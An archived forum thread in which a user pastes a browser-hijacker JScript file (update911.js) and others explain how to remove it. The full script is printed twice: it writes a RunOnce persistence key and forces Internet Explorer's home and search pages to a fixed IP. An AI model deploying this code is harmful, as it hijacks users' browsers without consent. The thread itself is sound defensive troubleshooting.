Trojan Hourse Downloader Esepor.f

  • Thread starter Thread starter Newsgroup ®
  • Start date Start date
N

Newsgroup ®

This variant seems to be new as I have searched goggle for information
without much success.

Yesterday AVG anti virus software picked up that I had this virus while I
was on the internet I can't recall downloading any suspicious files or any
emails.

AVG found and cleaned the virus tmksrvu.exe but left a file which I found in
c:/windows " update911.JScript Script File"

Contents of file :

var url = "http://81.211.105.9/index.php?v=1";
var burl = "http://81.211.105.9/search.php?v=1";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\update911.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\
\tlc",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start
Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search
Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search
Bar",burl);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use
Search Asst","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use
Custom Search URL",1,"REG_DWORD");

When internet explorer is opened http://81.211.105.9/index.php?v=1 comes up
as the homepage if altered it comes back the next time you boot up.
Deletion of "update911.JScript Script File" results in a missing folder
message on next boot.
I have searched regedit to try and eliminate this pointer to the
update911.JScript Script File without success.
My solution was to change the first 2 lines to my usual homepage
http://www.goggle.co.uk to avoid the missing folder message and internet
explorer to work correctly.

Can anyone offer advise on a method to correctly restore the settings and
deletion of the offending file.


Thanks in advance for any help or comments.

Derek.
 
On that special day, Newsgroup ®, ([email protected]) said...
This variant seems to be new as I have searched goggle for information
without much success.
Click to expand...

Trojan Downloader doens't exactly ssem to fit the purpose of this beast.
If I look at the contents, it looks rather like a Hijacker (redirector
of start pages and search pages, in order to create webhits on certain
ads and making a fortune from that).
Contents of file :

var url = "http://81.211.105.9/index.php?v=1";
var burl = "http://81.211.105.9/search.php?v=1";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\update911.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\
\tlc",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start
Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search
Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search
Bar",burl);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use
Search Asst","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use
Custom Search URL",1,"REG_DWORD");
Click to expand...
Deletion of "update911.JScript Script File" results in a missing folder
message on next boot.
Click to expand...

No wonder.

var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\update911.js";

There is a command to create this "Special" folder, probably issued by
an "Active Object", which was downloaded from the URL, and update911.js
was put inside it.
I have searched regedit to try and eliminate this pointer to the
update911.JScript Script File without success.
Click to expand...

Probably it isn't enough to delete 922update entries, you must also find
out the name of the "Special" folder, and remove references in the
Registry, too. The lines give a hint where to search.

Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion
\\RunOnce\\tlc",filepath);

Look for an entry at said place, and remove the "filepath", which should
be ending either with 911update or the "Special" foldername, or both
combined

Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main
\\StartPage",url);

Go to said entry. Remove the startpage entry. You can change it by using
System settings, Internet properties, anyway, no need to enter anything
into the registry by hand.

Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main
\\SearchPage",url);

Same as above.

Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main
\\SearchBar",burl);

That Hijacker is thorough. Do as above.

Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main
\\UseSearch Asst","no");

Remove this entry, or set it to "yes". It is meant to keep you from
accessing your Search Assistant.

Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main
\\UseCustom Search URL",1,"REG_DWORD");

Delete the URL in the key, or remove the UseCustom key completely.
Can anyone offer advise on a method to correctly restore the settings and
deletion of the offending file.
Click to expand...

Well, I am no IE user (guess why), I do mainly use Opera, and if Viwe-
Source:(URL) is needed (in order to check a fishy site, but not execute
any Java crap there), I switch to Mozilla. But I think working on the
registry as told above, should get rid of the Hijacking.

You should better disable Active Scripting in the "Internet" (ie the
Internet *Explorer* settings), as it was that which allowed for the
Hijacking.

And read http://www.spywareinfo.com/~merijn/cwschronicles.html
which will give you an idea of what is going on out there. There are
many variants of malware, and in fact the non-viruses are by now more
active than the classic viruses (=viruses in their *proper* meaning;
programs that copy themselves *into* other programs and wait for being
run, and then inserting themselves into more executables).


Gabriele Neukam

(e-mail address removed)
 
Many thanks to you both following your advice have completely got rid of
UPDATE911.
Have also installed all the security updates for IE hopefully fingers
crossed this will not occur again.

Best wishes.

Derek
SW Scotland
 
Back
Top